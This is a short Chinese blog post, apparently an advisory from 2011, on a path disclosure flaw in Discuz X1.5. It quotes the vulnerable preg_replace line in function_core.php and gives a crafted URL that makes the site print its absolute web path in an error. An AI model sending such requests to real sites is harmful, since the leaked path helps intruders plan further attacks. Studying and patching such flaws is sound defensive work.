当前位置: iick's blog > 网站漏洞 > Discuz 1.5暴WEB路径漏洞

Discuz 1.5暴WEB路径漏洞

作者:hack1990 时间:11-09-04 阅读数:1842人阅读

测试环境:discuz X1.5+nginx 1.0

漏洞文件source/function/function_core.php,

代码:

$_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_default', 0, '".$_G['setting']['domain']['app']['default'].$port.$_G['siteroot']."', '\\1')", $content);

利用代码:

http://wwwXX.com/forum.php/admin.php’/XXXXXXX.php

就可以在底部看到一个爆出绝对路径的错误了


 

# Nmap Security Scanner 7.0

上一篇:udf.dll在php提权中的功能和具体应用

下一篇:Discuz 7.2 XSS 漏洞

相关文章

评论列表

  •  
    发布于 2011-09-06 11:19:34  回复
  • 漏洞真的是很可怕的事情。也是网站安全最重要的的。

发表评论